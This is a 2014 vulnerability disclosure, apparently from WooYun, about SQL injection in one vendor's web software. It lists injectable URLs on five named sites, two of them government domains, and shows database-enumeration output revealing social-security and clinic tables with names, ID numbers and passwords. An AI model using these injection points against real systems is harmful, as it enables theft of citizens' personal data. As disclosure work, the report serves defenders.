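Generic SQL injection vulnerability in software from an Anhui network technology company (1,000,000+ social security account records exposed)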

2014-05-25 20:25

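Technical support: 安徽科艾网络技术有限公司 (Anhui Keai Network Technology Co., Ltd.)

Vulnerable sites:

http://www.hnldj.gov.cn/ (560,000+ social security personnel records)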

http://www.hngwyj.gov.cn/

http://www.ccccah.cn/

http://www.yiyi-group.com/

http://www.xjjwhg.com/

... ...

Injection points:

Site 1

http://www.hnldj.gov.cn/new/zwgk.php?class_id=115

http://www.hnldj.gov.cn/new/ztzl.php?class_id=3396

http://www.hnldj.gov.cn/new/News_Text.php?id=3709&class_id=168

http://www.hnldj.gov.cn/new/ztzl_Text.php?class_id=3396&id=801

http://www.hnldj.gov.cn/red/ztzl.php?class_id=3396

http://www.hnldj.gov.cn/red/gdzl.php?style=3&lanmu=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%A1%A2%CA%A1%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD

http://www.hnldj.gov.cn/red/nmg.php?class_id=74

http://www.hnldj.gov.cn/red/zcgl.php?class_id=70

http://www.hnldj.gov.cn/red/ldjc.php?class_id=66

http://www.hnldj.gov.cn/red/zynl.php?class_id=62

http://www.hnldj.gov.cn/red/rlzy.php?class_id=34

http://www.hnldj.gov.cn/red/bszn.php?class_id=46

http://www.hnldj.gov.cn/red/jyzd.php?class_id=42

http://www.hnldj.gov.cn/red/zwgk.php?class_id=10

http://www.hnldj.gov.cn/red/shbx.php?class_id=38

http://www.hnldj.gov.cn/red/ztzl_text.php?id=799&class_id=3396

Site 2

http://www.hngwyj.gov.cn/downfileclassify.php?classify=1

http://www.hngwyj.gov.cn/arccotent.php?id=1245

Site 3

http://www.ccccah.cn/News_Text.php?id=95&class_id=112

http://www.ccccah.cn/gcyj.php?class_id=9

http://www.ccccah.cn/News_Text.php?class_id=13&id=699

Site 4

http://www.yiyi-group.com/popbase.php?base_id=3356&id=18

http://www.yiyi-group.com/member_popbase.php?base_id=3245&id=43

http://www.yiyi-group.com/rlzy_popbase.php?id=47

http://www.yiyi-group.com/xmhz_popbase.php?base_id=3349&id=30

Site 5

http://www.xjjwhg.com/model3.php?news_id=292

http://www.xjjwhg.com/model2.php?category_id=2&category_value=10

Proof of vulnerability:

Taking site 1 as an example, over 1,000,000 sensitive records are exposed:

Current database:

web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET
back-end DBMS: MySQL 5.0.11
current database: 'hnrllb'



Tables in the database:

Database: hnrllb
[12 tables]
+-------------+
| admin       |
| base        |
| class       |
| com_ledger  |
| menzhen     |
| message     |
| per_account |
| per_ybzh    |
| photo       |
| temp        |
| ypxx        |
| ztzl        |
+-------------+



The columns of per_account:

Table: per_account
[14 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| no       | varchar(255) |
| AAE002   | varchar(255) |
| birth    | varchar(255) |
| card_id  | varchar(255) |
| GRZHBYJZ | varchar(255) |
| name     | varchar(255) |
| sex      | varchar(255) |
| YBBYSR   | varchar(255) |
| YBBYZC   | varchar(255) |
| YBLJCC   | varchar(255) |
| YBLJJF   | varchar(255) |
| YLGRJF   | varchar(255) |
| YLLJCC   | varchar(255) |
| YLLJYS   | varchar(255) |
+----------+--------------+



per_account holds 600,000+ records:

Database: hnrllb
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| per_account | 606436  |
+-------------+---------+



Next, the menzhen table:

Table: menzhen
[9 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| card_id    | varchar(20)  |
| Community  | varchar(100) |
| end_time   | varchar(20)  |
| hospital   | varchar(100) |
| name       | varchar(20)  |
| num        | varchar(20)  |
| person_no  | varchar(20)  |
| psd        | varchar(20)  |
| start_time | varchar(20)  |
+------------+--------------+



menzhen holds name, psd and other account information, 560,000+ records in total:

Database: hnrllb
+---------+---------+
| Table   | Entries |
+---------+---------+
| menzhen | 563121  |
+---------+---------+



Fix:

You know what to do!

Source: www.wooyun.org/bugs/wooyun-2014-051912
